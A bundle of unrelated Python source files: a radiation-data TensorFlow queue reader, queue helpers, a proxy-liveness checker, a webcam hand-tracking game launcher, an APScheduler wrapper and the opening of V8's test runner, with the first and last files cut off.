files = [] for root, dirnames, filenames in os.walk(directory): for filename in fnmatch.filter(filenames, pattern): files.append(os.path.join(root, filename)) return files def interpolate(x, y, standard_x, t_or_h='r'): x = np.flip(x,0) y = np.flip(y,0) level_size = len(standard_x) spl = splrep(x, y) for start_index, start in enumerate(standard_x): if x[0] <= start: start_index = start_index - 1 break for end_index, end in enumerate(standard_x): if x[-1] <= end: end_index = end_index + 1 break #valid intervals [start_index, end_index) interpolated = splev(standard_x[start_index:end_index], spl) interpolated[0] = interpolated[1] interpolated[-1] = interpolated[-2] if t_or_h == 't': standard_y = np.append(np.zeros(start_index), normalizeT(interpolated)) standard_y = np.append(standard_y, np.zeros(level_size - end_index)) elif t_or_h == 'h': standard_y = np.append(np.zeros(start_index), normalizeH(interpolated)) standard_y = np.append(standard_y, np.zeros(level_size - end_index)) else: standard_y = np.append(np.zeros(start_index), interpolated) standard_y = np.append(standard_y, np.zeros(level_size - end_index)) assert len(standard_y) == level_size return standard_y def load_data_samples(files): """ Generator that yields samples from the directory. In the latest versions, the files are files where each line is a sample in json format. This function basically read each sample of the file and normalizes it and generates the data for the model in the desired format. :param files: list of files :return: iterable that contains the data, the label and the identifier of the sample. """ for filename in files: with lock: f = Dataset(filename, mode='r') v = f.variables['radiation_data'][:] f.close() #ids = np.random.choice(np.arange(v.shape[0]), size = 10, replace=False) for id in range(v.shape[0]): #data = np.append(v[id,0:122],v[id, 182:243]) #data = np.append(v[id,0:2],normalizeT(v[id, 2:62])) #data = np.append(data, normalizeH(v[id,62:122])) #data = np.append(data, normalizeP(v[id,182:243])) ''' data = [] for i in range(60): data.append(normalizeC(v[id, 0])) data.append(normalizeT(v[id, 1])) data.append(normalizeT(v[id, i+2])) data.append(normalizeH(v[id, i + 62])) data.append(normalizeP(v[id, i + 182])) ''' # data = np.append(data, normalizeC(v[id, 0])) # data = np.append(data, normalizeT(v[id, 1])) # data = np.append(data, normalizeT(v[id, i+2])) # data = np.append(data, normalizeH(v[id, i + 62])) # data = np.append(data, normalizeP(v[id, i + 182])) air_pressure = cal_air_pressure(v[id, 182:243]) inter_air_temperature = interpolate(air_pressure, v[id, 2:62], standard_x, 't') inter_humidity = interpolate(air_pressure, v[id, 62:122], standard_x, 'h') inter_radiation = interpolate(air_pressure, v[id, 122:182], standard_x) data = np.append(normalizeC(v[id, 0]), normalizeT(v[id, 1])) data = np.append(data, np.zeros(level_size - 2)) data = np.append(data, inter_air_temperature) data = np.append(data, inter_humidity) #data = np.append(data, normalizeP(v[id, 182:243])) label = np.array(inter_radiation) ''' data.append(v[id,0]) data.append(v[id,1]) num_levels = int((v.shape[1]-2)/3) for i in range(num_levels): data.append(v[id,i+2]) data.append(v[id,i+98]) label.append(v[id,i+194]) for _ in range(0, 196 - 194): data.append(np.float32(0.0)) ''' if np.isnan(data.sum()) or np.isnan(label.sum()): print("NaN found!!!!!") continue yield data, label, [id] class FileReader(object): """ Background reader that pre-processes radiation files and enqueues them into a TensorFlow queue. """ def __init__(self, data_dir, test_dir, coord, n_input=180, n_output=60, queue_size=5000000, test_percentage=0.2): # TODO: Implement a option that enables the usage of a test queue, by default it is # enabled here. For implementing this, the flag should be propagated to the several # functions that operate with both queues. self.data_dir = data_dir self.test_dir = test_dir self.coord = coord self.n_input = n_input self.n_output = n_output self.threads = [] self.sample_placeholder_train = tf.placeholder(tf.float32, [n_input]) self.result_placeholder_train = tf.placeholder(tf.float32, [n_output]) self.sample_placeholder_test = tf.placeholder(tf.float32, [n_input]) self.result_placeholder_test = tf.placeholder(tf.float32, [n_output]) self.idFile_placeholder_test = tf.placeholder(tf.int32, [1]) self.idFile_placeholder_train = tf.placeholder(tf.int32, [1]) self.queue_train = tf.PaddingFIFOQueue(queue_size, [tf.float32, tf.float32, tf.int32], shapes=[[n_input], [n_output], [1]]) self.queue_test = tf.PaddingFIFOQueue(queue_size, [tf.float32, tf.float32, tf.int32], shapes=[[n_input], [n_output], [1]]) self.enqueue_train = self.queue_train.enqueue( [self.sample_placeholder_train, self.result_placeholder_train, self.idFile_placeholder_train]) self.enqueue_test = self.queue_test.enqueue( [self.sample_placeholder_test, self.result_placeholder_test, self.idFile_placeholder_test]) # https://github.com/tensorflow/tensorflow/issues/2514 # https://groups.google.com/a/tensorflow.org/forum/#!topic/discuss/rmGu1HAyPw4 # Use of a flag that changes the input queue to another one, this way the model can # be tested using the test queue when required. self.select_q = tf.placeholder(tf.int32, []) self.queue = tf.QueueBase.from_list( self.select_q, [self.queue_train, self.queue_test]) # Find any file as the reggex is * self.files = find_files(data_dir, '*') if not self.files: raise ValueError("No data files found in '{}'.".format(data_dir)) print("training files length: {}".format(len(self.files))) self.test_files = find_files(test_dir, '*') if not self.test_files: raise ValueError( "No test data files found in '{}'.".format(test_dir)) print("test files length: {}".format(len(self.test_files))) # Split the data into test and train datasets # range = int(len(self.files) * test_percentage) self.test_dataset = self.test_files self.train_dataset = self.files def dequeue(self, num_elements): """ Function for dequeueing a mini-batch :param num_elements: int size of minibatch :return: """ data, label, id = self.queue.dequeue_many(num_elements) return data, label, id def queue_switch(self): return self.select_q def thread_main(self, sess, id, n_thread, test): """ Thread function to be launched as many times as required for loading the data from several files into the Tensorflow's queue. :param sess: Tensorflow's session :param id: thread ID :param test: bool for choosing between the queue to feed the data, True for test queue :return: void """ global epoch stop = False # Go through the dataset multiple times if test: files = self.test_dataset else: files = self.train_dataset # while tensorflows coordinator doesn't want to stop, continue. while not stop: epoch += 1 if not test: print("Number of epochs: {}".format(epoch)) randomized_files = randomize_files(files) ''' file_partitions = [] for index, i in enumerate(files): if (index)%(n_thread-1)+1 == id: file_partitions.append(i) randomized_files = randomize_files(file_partitions) ''' iterator = load_data_samples(randomized_files) for data, label, id_file in iterator: # update coordinator's state if self.coord.should_stop(): stop = True break if test: # in train range and test thread sess.run(self.enqueue_test, feed_dict={self.sample_placeholder_test: data, self.result_placeholder_test: label, self.idFile_placeholder_test: id_file}) else: # below the rage -> train sess.run(self.enqueue_train, feed_dict={self.sample_placeholder_train: data, self.result_placeholder_train: label, self.idFile_placeholder_train: id_file}) def start_threads(self, sess, n_threads=2): """ Reader threads' launcher, uses the first thread for feeding into the test queue and the rest for feeding into the train queue. :param sess: :param n_threads: :return: void """ for id in range(n_threads): if id == 0: thread = threading.Thread( target=self.thread_main, args=(sess, id, n_threads, True)) else: thread = threading.Thread( target=self.thread_main, args=(sess, id, n_threads, False)) thread.daemon = True # Thread will close when parent quits. thread.start() self.threads.append(thread) return self.threads # not used anymore def decompose_data(self, data): levels = 96 CO2 = data[0] surface_temperature = data[1] air_temperature = [] humidity = [] for i in range(2, levels * 2 + 2): if (i % 2) == 0: # even air_temperature.append(denormalize(data[i], meanT, stdT)) else: humidity.append(denormalize(data[i], meanH, stdH)) input_dic = { "surface_temperature": surface_temperature, "co2": CO2, "air_temperature": air_temperature, "humidity": humidity } return input_dic
q.py
from queue import Queue from threading import Thread from time import sleep from bripy.bllb.logging import logger, DBG def unloadq(q, stop, limit=2000, rest=.1, check=100): i = limit loops = 0 results = [] while True and ((i and not stop()) or q.qsize()): loops += 1 if loops % check == 0: DBG(i, loops, len(results)) if q.qsize(): x = q.get() DBG(x) results.append(x) i = min(i + 1, limit) else: i -= 1 if i % check == 0: DBG(i) sleep(rest) return results def multiplex(n, q, **kwargs): """ Convert one queue into several equivalent Queues >>> q1, q2, q3 = multiplex(3, in_q) """ out_queues = [Queue(**kwargs) for i in range(n)] def f(): while True: x = q.get() for out_q in out_queues: out_q.put(x) t = Thread(target=f) t.daemon = True t.start() return out_queues def push(in_q, out_q): while True: x = in_q.get() out_q.put(x) def merge(*in_qs, **kwargs): """ Merge multiple queues together >>> out_q = merge(q1, q2, q3) """ out_q = Queue(**kwargs) threads = [Thread(target=push, args=(q, out_q)) for q in in_qs] for t in threads: t.daemon = True t.start() return out_q def iterq(q): while q.qsize(): yield q.get() def get_q(q): results = [] while not q.empty() or q.qsize(): item = q.get() if item == 'STOP': DBG('STOP get_q') q.task_done() break DBG(item) if item: results.append(item) q.task_done() return results
testProxy.py
#! /usr/bin/env python #-*- coding:utf-8 -*- import urllib2 import re import threading class TestProxy(object): def __init__(self): self.sFile = r'proxy.txt' self.dFile = r'alive.txt' self.URL = r'http://www.baidu.com' self.threads = 10 self.timeout = 3 self.regex = re.compile(r'baidu.com') self.aliveList = [] self.run() def run(self): with open(self.sFile, 'r') as fp: lines = fp.readlines() line = lines.pop() while lines: for i in xrange(self.threads): t = threading.Thread(target=self.linkWithProxy, args=(line,)) t.start() if lines: line = lines.pop() else: continue def linkWithProxy(self, line): lineList = line.split('\t') protocol = lineList[2].lower() server = protocol + r'://' + lineList[0] + ':' + lineList[1] opener = urllib2.build_opener(urllib2.ProxyHandler({protocol:server})) urllib2.install_opener(opener) try: response = urllib2.urlopen(self.URL, timeout=self.timeout) except: print('%s connect failed' %server) return else: try: str = response.read() except: print('%s connect failed' % server) return if self.regex.search(str): print('%s connect sucess ......' % server) self.aliveList.append(line) with open(self.dFile, 'a') as fp: fp.write(line) if __name__=="__main__": TP = TestProxy()
NumberPedia-HandTracking.py
#gui from msilib.schema import Font from tkinter import * from tkinter import ttk from tkinter.font import Font import cv2, os, pygame.image, pygame.camera #tracking from cvzone.HandTrackingModule import HandDetector from cvzone.ColorModule import ColorFinder from cvzone import FPS import GeneralAttribute, PacketSender, UDPDataSender import os, cv2, numpy as np, pyautogui, threading, cvzone, imutils, socket def SetupNotification(content, position): lblNotif.config(text=content) lblNotif.place(x=position) def StartExWebcam(index): global cap, scaleSet, webcamStatus cap = cv2.VideoCapture(index) if int(trackingType.get()) == 1: HandVisualizing() elif int(trackingType.get()) == 2: #BallColorVisualizing() webcamStatus = False exWebcamButton(True) SetupNotification("Ball Tracking Feature Still Under Maintenance!", 130) def ValidationInputExWebcam(): global webcamStatus if comboWebcam.get() != "Select Your Camera": for i in range(0, len(list_cam)): if comboWebcam.get() == list_cam[i]: StartExWebcam(i) else: webcamStatus = False exWebcamButton(True) SetupNotification("Please Select Your External Webcam!", 150) def ScaleSetting(x): global scaleSet scaleSet = -x def BrigtnessSetting(x): print(x) def BallCircleVisualizing(): global cap, scaleSet, webcamStatus SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100) GeneralAttribute.isRun = True thread_sender = threading.Thread(target=UDPDataSender.SendingPacket) thread_sender.start() widthScreen, heightScreen = pyautogui.size() winName = 'NumberPedia-HandTracking' greenLower = (29, 86, 6) greenUpper = (64, 255, 255) fpsReader = FPS() cap.set(3, 1280) cap.set(4, 720) cv2.namedWindow(winName) cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting) cv2.setTrackbarMin('Zoom Scalling', winName, -50) cv2.setTrackbarMax('Zoom Scalling', winName, -1) cv2.setTrackbarPos('Zoom Scalling', winName, -50) while True: success, img = cap.read() #get the webcam size height, width, channels = img.shape #prepare the crop centerX, centerY = int(height/2), int(width/2) radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100) minX, maxX = centerX - radiusX, centerX + radiusX minY, maxY = centerY - radiusY, centerY + radiusY cropped = img[minX:maxX, minY:maxY] resized_cropped = cv2.resize(cropped, (width, height)) result = imutils.resize(resized_cropped, width=600) hsv = cv2.cvtColor(result, cv2.COLOR_BGR2HSV) mask = cv2.inRange(hsv, greenLower, greenUpper) mask = cv2.erode(mask, None, iterations=2) mask = cv2.dilate(mask, None, iterations=2) cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] center = None if len(cnts) > 0: c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) if radius > 10: cv2.circle(result, (int(x), int(y)), int(radius), (0, 255, 255), 2) #result = cv2.resize(result, (0, 0), None, 0.7, 0.7) cv2.imshow(winName, result) if cv2.waitKey(1) & 0xFF == 27: cap.release() cv2.destroyAllWindows() GeneralAttribute.isRun = False webcamStatus = False SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105) exWebcamButton(True) break def BallColorVisualizing(): global cap, scaleSet, webcamStatus SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100) GeneralAttribute.isRun = True thread_sender = threading.Thread(target=UDPDataSender.SendingPacket) thread_sender.start() widthScreen, heightScreen = pyautogui.size() winName = 'NumberPedia-HandTracking' fpsReader = FPS() cap.set(3, 1280) cap.set(4, 720) cv2.namedWindow(winName) cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting) cv2.setTrackbarMin('Zoom Scalling', winName, -50) cv2.setTrackbarMax('Zoom Scalling', winName, -1) cv2.setTrackbarPos('Zoom Scalling', winName, -50) success, img = cap.read() h, w, _ = img.shape myColorFinder = ColorFinder(False) hsvVals = {'hmin': 33, 'smin': 72, 'vmin': 126, 'hmax': 58, 'smax': 255, 'vmax': 255} while True: success, img = cap.read() #get the webcam size height, width, channels = img.shape #prepare the crop centerX, centerY = int(height/2), int(width/2) radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100) minX, maxX = centerX - radiusX, centerX + radiusX minY, maxY = centerY - radiusY, centerY + radiusY cropped = img[minX:maxX, minY:maxY] resized_cropped = cv2.resize(cropped, (width, height)) if isNormal.get() == True: result = resized_cropped elif isVertical.get() == True and isHorizontal.get() == True: resultTemp = cv2.flip(resized_cropped, 0) result = cv2.flip(resultTemp, 1) elif isVertical.get() == True: result = cv2.flip(resized_cropped, 0) elif isHorizontal.get() == True: result = cv2.flip(resized_cropped, 1) imgColor, mask = myColorFinder.update(result, hsvVals) result, contours = cvzone.findContours(result, mask) if contours: for index, ball_landmark in enumerate(contours): disallowed_characters = "( )" totalBall = index if index == 0: data = f"{contours[0]['center'][0]},{h - contours[0]['center'][1]},{int(contours[0]['area'])}" for char in disallowed_characters: data = data.replace(char, "") #print(f"{index},{data}") #imgStack = cvzone.stackImages([imgContour, imgColor], 1, 0.5) #cv2.imshow(winName, imgStack) result = cv2.resize(result, (0, 0), None, 0.7, 0.7) cv2.imshow(winName, result) if cv2.waitKey(1) & 0xFF == 27: cap.release() cv2.destroyAllWindows() GeneralAttribute.isRun = False webcamStatus = False SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105) exWebcamButton(True) break def HandVisualizing(): global cap, scaleSet, webcamStatus SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100) GeneralAttribute.isRun = True thread_sender = threading.Thread(target=UDPDataSender.SendingPacket) thread_sender.start() widthScreen, heightScreen = pyautogui.size() winName = 'NumberPedia-HandTracking' fpsReader = FPS() cap.set(3, 1280) cap.set(4, 720) detector = HandDetector(detectionCon=0.8, maxHands=4) hands_array = np.empty(10, dtype=object) cv2.namedWindow(winName) cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting) cv2.setTrackbarMin('Zoom Scalling', winName, -50) cv2.setTrackbarMax('Zoom Scalling', winName, -1) cv2.setTrackbarPos('Zoom Scalling', winName, -50) cv2.createTrackbar('Brightness Adjustment', winName, 0, 100, BrigtnessSetting) while True: totalHand = 0 success, img = cap.read() #get the webcam size height, width, channels = img.shape #prepare the crop centerX, centerY = int(height/2), int(width/2) radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100) minX, maxX = centerX - radiusX, centerX + radiusX minY, maxY = centerY - radiusY, centerY + radiusY cropped = img[minX:maxX, minY:maxY] resized_cropped = cv2.resize(cropped, (width, height)) if isNormal.get() == True: result = resized_cropped elif isVertical.get() == True and isHorizontal.get() == True: resultTemp = cv2.flip(resized_cropped, 0) result = cv2.flip(resultTemp, 1) elif isVertical.get() == True: result = cv2.flip(resized_cropped, 0) elif isHorizontal.get() == True: result = cv2.flip(resized_cropped, 1) hands, result = detector.findHands(result) # With Draw # hands = detector.findHands(img, draw=False) # No Draw if hands: for index, hand_landmark in enumerate(hands): hands_array[index] = hands[index] disallowed_characters = "( )" totalHand = index if index == 0: position_index_1 = str(hands_array[0]["center"]) GeneralAttribute.positionHand = f"{index + 1},{position_index_1}" for char in disallowed_characters: GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "") elif index == 1: position_index_1 = str(hands_array[0]["center"]) position_index_2 = str(hands_array[1]["center"]) GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2}" for char in disallowed_characters: GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "") elif index == 2: position_index_1 = str(hands_array[0]["center"]) position_index_2 = str(hands_array[1]["center"]) position_index_3 = str(hands_array[2]["center"]) GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2},{position_index_3}" for char in disallowed_characters: GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "") elif index == 3: position_index_1 = str(hands_array[0]["center"]) position_index_2 = str(hands_array[1]["center"]) position_index_3 = str(hands_array[2]["center"]) position_index_4 = str(hands_array[3]["center"]) GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2},{position_index_3},{position_index_4}" for char in disallowed_characters: GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "") #sock.sendto(str.encode(str(GeneralAttribute.positionHand)), serverAddressPort) else: GeneralAttribute.positionHand = "" cv2.putText(result, f'Esc To Stop Camera', (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2) cv2.putText(result, f'Slide To Right For Scalling Camera Zoom', (50, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) fps, img = fpsReader.update(result,pos=(50, 610),color=(128,0,0),scale=1.5,thickness=2) cv2.putText(result, f'Sending: {GeneralAttribute.positionHand}', (50, 640), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2) cv2.putText(result, f'Total Hand Detected: {totalHand + 1}', (50, 670), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2) result = cv2.resize(result, (0, 0), None, 0.7, 0.7) cv2.imshow(winName, result) if cv2.waitKey(1) == 27: cap.release() cv2.destroyAllWindows() GeneralAttribute.isRun = False webcamStatus = False SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105) exWebcamButton(True) break def GetListWebcam(): pygame.camera.init() cameras = pygame.camera.list_cameras() totalCamera = len(cameras) for i in range(0, totalCamera): list_cam.append(str(cameras[i])) #define capture device cap = None webcamStatus = False list_cam = list() GetListWebcam() #sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #serverAddressPort = ("127.0.0.1", 5053) root = Tk() root.title("NumberPedia") root.geometry("550x350") root.resizable(0, 0) #import gui img_logoNumberPedia = PhotoImage(file='Assets/ico_logo.png') img_handEmoji = PhotoImage(file='Assets/ico_handemoji.png') img_ballEmoji = PhotoImage(file='Assets/ico_ballemoji.png') img_toggle_ex = PhotoImage(file='Assets/ico_toggleoff.png') img_launchGame = PhotoImage(file='Assets/ico_launchgame.png') header1_font = Font(family="Poppins", size=12) header2_font = Font(family="Poppins", size=10) #setting gui lblLogo = Label(root, image=img_logoNumberPedia) lblLogo.place(x=275 - img_logoNumberPedia.width() / 2, y=75 - img_logoNumberPedia.height() / 2) lblTracking = Label(root, text="Tracking Type", font=header1_font) lblTracking.place(x=35, y=150) lblWebcam = Label(root, text="Flipping Type", font=header1_font) lblWebcam.place(x=35, y=185) lblWebcam = Label(root, text="External Webcam", font=header1_font) lblWebcam.place(x=35, y=220) #tracking type trackingType = IntVar() trackingType.set(1) trackingHand = Radiobutton(root, text="Hand Tracking", font=header2_font, variable=trackingType, value=1, image=img_handEmoji, compound='left') trackingHand.place(x=205, y=150) trackingBall = Radiobutton(root, text="Ball Tracking", font=header2_font, variable=trackingType, value=2, image=img_ballEmoji, compound='left') trackingBall.place(x=380, y=150) #flip type isNormal = BooleanVar() isVertical = BooleanVar() isHorizontal = BooleanVar() flipNormal = Checkbutton(root, text="Normal", font=header2_font, variable=isNormal, onvalue=True, offvalue=False) flipNormal.place(x=205, y=185) flipNormal.select() flipVertical = Checkbutton(root, text="Vertically", font=header2_font, variable=isVertical, onvalue=True, offvalue=False) flipVertical.place(x=285, y=185) flipHorizontal = Checkbutton(root, text="Horizontally", font=header2_font, variable=isHorizontal, onvalue=True, offvalue=False) flipHorizontal.place(x=380, y=185) #external cam def exWebcamButton(index): global webcamStatus if index == True: if webcamStatus == True: SetupNotification("Please Close Your Webcam With Esc Button!", 130) else: webcamStatus = False img_toggle_ex.configure(file='Assets/ico_toggleoff.png') btnExWebcam.configure(command=lambda:exWebcamButton(False)) elif index == False: webcamStatus = True img_toggle_ex.configure(file='Assets/ico_toggleon.png') btnExWebcam.configure(command=lambda:exWebcamButton(True)) if isNormal.get() == True and isVertical.get() == True or isNormal.get() == True and isHorizontal.get() == True: webcamStatus = False exWebcamButton(True) SetupNotification("You Only Choose Normal Or Set Horizontal And Vertical!", 100) elif isNormal.get() == isVertical.get() == isHorizontal.get() == False: webcamStatus = False exWebcamButton(True) SetupNotification("Please Select One Of Flip Type Above!", 150) else: SetupNotification("Loading... Please Wait!", 200) thread_webcam = threading.Thread(target=lambda:ValidationInputExWebcam()) thread_webcam.start() comboWebcam = ttk.Combobox(root, value=list_cam, width=25) comboWebcam.set("Select Your Camera") comboWebcam.place(x=200, y=225) lblExWebcam = Label(root, text="Start?", font=header2_font) lblExWebcam.place(x=400, y=222) btnExWebcam = Button(root, image=img_toggle_ex, border=0, command=lambda:exWebcamButton(False)) btnExWebcam.place(x=465, y=228) #game def ThreadForGame(): global webcamStatus if webcamStatus == True: thread_game = threading.Thread(target=PlayTheGame) thread_game.start() else: SetupNotification("Setup The Webcam First, Please!", 170) def PlayTheGame(): root_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) root_directory = os.path.join(root_directory, 'NumberPedia', 'NumberPedia.exe') game_directory = root_directory.replace("\\", "/") os.system(game_directory) #print(game_directory) btnLaunchGame = Button(root, image=img_launchGame, border=0, command=lambda:ThreadForGame()) btnLaunchGame.place(x=275 - img_launchGame.width() / 2, y=275 - img_launchGame.height() / 2) #notif lblNotif = Label(root, text="Setup and Start Webcam First! Then Launch The Game", fg="red", font= header2_font) lblNotif.place(x=105,y=300) root.mainloop()
__init__.py
""" 集成定时任务。 """ import time from typing import Union import threading from apscheduler.schedulers.background import BackgroundScheduler # noinspection PyProtectedMember from apscheduler.util import undefined from function_scheduling_distributed_framework import frame_config from function_scheduling_distributed_framework.consumers.base_consumer import AbstractConsumer def timing_publish_deco(consuming_func_decorated_or_consumer: Union[callable, AbstractConsumer]): def _deco(*args, **kwargs): if getattr(consuming_func_decorated_or_consumer, 'is_decorated_as_consume_function', False) is True: consuming_func_decorated_or_consumer.push(*args, **kwargs) elif isinstance(consuming_func_decorated_or_consumer, AbstractConsumer): consuming_func_decorated_or_consumer.publisher_of_same_queue.push(*args, **kwargs) else: raise TypeError('consuming_func_decorated_or_consumer 必须是被 task_deco 装饰的函数或者consumer类型') return _deco class FsdfBackgroundScheduler(BackgroundScheduler): """ 自定义的,添加一个方法add_timing_publish_job """ # noinspection PyShadowingBuiltins def add_timing_publish_job(self, func, trigger=None, args=None, kwargs=None, id=None, name=None, misfire_grace_time=undefined, coalesce=undefined, max_instances=undefined, next_run_time=undefined, jobstore='default', executor='default', replace_existing=False, **trigger_args): return self.add_job(timing_publish_deco(func), trigger, args, kwargs, id, name, misfire_grace_time, coalesce, max_instances, next_run_time, jobstore, executor, replace_existing, **trigger_args) def start(self): def _block_exit(): while True: time.sleep(3600) threading.Thread(target=_block_exit).start() # 既不希望用BlockingScheduler阻塞主进程也不希望定时退出。 super(FsdfBackgroundScheduler, self).start() # _block_exit() # python3.9 判断守护线程结束必须主线程在运行,否则结尾 fsdf_background_scheduler = FsdfBackgroundScheduler(timezone=frame_config.TIMEZONE) # fsdf_background_scheduler = FsdfBackgroundScheduler() if __name__ == '__main__': # 定时运行消费演示 import datetime from function_scheduling_distributed_framework import task_deco, BrokerEnum, fsdf_background_scheduler, timing_publish_deco @task_deco('queue_test_666', broker_kind=BrokerEnum.LOCAL_PYTHON_QUEUE) def consume_func(x, y): print(f'{x} + {y} = {x + y}') # 定时每隔3秒执行一次。 fsdf_background_scheduler.add_job(timing_publish_deco(consume_func), 'interval', id='3_second_job', seconds=3, kwargs={"x": 5, "y": 6}) # 定时,只执行一次 fsdf_background_scheduler.add_job(timing_publish_deco(consume_func), 'date', run_date=datetime.datetime(2020, 7, 24, 13, 53, 6), args=(5, 6,)) # 定时,每天的11点32分20秒都执行一次。 fsdf_background_scheduler.add_timing_publish_job(consume_func, 'cron', day_of_week='*', hour=18, minute=22, second=20, args=(5, 6,)) # 启动定时 fsdf_background_scheduler.start() # 启动消费 consume_func.consume()
test.py
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import imp import optparse import os from os.path import join, dirname, abspath, basename, isdir, exists import platform import re import signal import subprocess import sys import tempfile import time import threading import utils from Queue import Queue, Empty VERBOSE = False # --------------------------------------------- # --- P r o g r e s s I n d i c a t o r s --- # --------------------------------------------- class ProgressIndicator(object): def __init__(self, cases): self.cases = cases self.queue = Queue(len(cases)) for case in cases: self.queue.put_nowait(case) self.succeeded = 0 self.remaining = len(cases) self.total = len(cases) self.failed = [ ] self.crashed = 0 self.terminate = False self.lock = threading.Lock() def PrintFailureHeader(self, test): if test.IsNegative(): negative_marker = '[negative] ' else: negative_marker = '' print "=== %(label)s %(negative)s===" % { 'label': test.GetLabel(), 'negative': negative_marker } print "Path: %s" % "/".join(test.path) def Run(self, tasks): self.Starting() threads = [] # Spawn N-1 threads and then use this thread as the last one. # That way -j1 avoids threading altogether which is a nice fallback # in case of threading problems. for i in xrange(tasks - 1): thread = threading.Thread(target=self.RunSingle, args=[]) threads.append(thread) thread.start() try: self.RunSingle() # Wait for the remaining threads for thread in threads: # Use a timeout so that signals (ctrl-c) will be processed. thread.join(timeout=10000000) except Exception, e: # If there's an exception we schedule an interruption for any # remaining threads. self.terminate = True # ...and then reraise the exception to bail out raise self.Done() return not self.failed def RunSingle(self): while not self.terminate: try: test = self.queue.get_nowait() except Empty: return case = test.case self.lock.acquire() self.AboutToRun(case) self.lock.release() try: start = time.time() output = case.Run() case.duration = (time.time() - start) except BreakNowException: self.terminate = True except IOError, e: assert self.terminate return if self.terminate: return self.lock.acquire() if output.UnexpectedOutput(): self.failed.append(output) if output.HasCrashed(): self.crashed += 1 else: self.succeeded += 1 self.remaining -= 1 self.HasRun(output) self.lock.release() def EscapeCommand(command): parts = [] for part in command: if ' ' in part: # Escape spaces and double quotes. We may need to escape more characters # for this to work properly. parts.append('"%s"' % part.replace('"', '\\"')) else: parts.append(part) return " ".join(parts) class SimpleProgressIndicator(ProgressIndicator): def Starting(self): print 'Running %i tests' % len(self.cases) def Done(self): print for failed in self.failed: self.PrintFailureHeader(failed.test) if failed.output.stderr: print "--- stderr ---" print failed.output.stderr.strip() if failed.output.stdout: print "--- stdout ---" print failed.output.stdout.strip() print "Command: %s" % EscapeCommand(failed.command) if failed.HasCrashed(): print "--- CRASHED ---" if failed.HasTimedOut(): print "--- TIMEOUT ---" if len(self.failed) == 0: print "===" print "=== All tests succeeded" print "===" else: print print "===" print "=== %i tests failed" % len(self.failed) if self.crashed > 0: print "=== %i tests CRASHED" % self.crashed print "===" class VerboseProgressIndicator(SimpleProgressIndicator): def AboutToRun(self, case): print 'Starting %s...' % case.GetLabel() sys.stdout.flush() def HasRun(self, output): if output.UnexpectedOutput(): if output.HasCrashed(): outcome = 'CRASH' else: outcome = 'FAIL' else: outcome = 'pass' print 'Done running %s: %s' % (output.test.GetLabel(), outcome) class DotsProgressIndicator(SimpleProgressIndicator): def AboutToRun(self, case): pass def HasRun(self, output): total = self.succeeded + len(self.failed) if (total > 1) and (total % 50 == 1): sys.stdout.write('\n') if output.UnexpectedOutput(): if output.HasCrashed(): sys.stdout.write('C') sys.stdout.flush() elif output.HasTimedOut(): sys.stdout.write('T') sys.stdout.flush() else: sys.stdout.write('F') sys.stdout.flush() else: sys.stdout.write('.') sys.stdout.flush() class CompactProgressIndicator(ProgressIndicator): def __init__(self, cases, templates): super(CompactProgressIndicator, self).__init__(cases) self.templates = templates self.last_status_length = 0 self.start_time = time.time() def Starting(self): pass def Done(self): self.PrintProgress('Done') def AboutToRun(self, case): self.PrintProgress(case.GetLabel()) def HasRun(self, output): if output.UnexpectedOutput(): 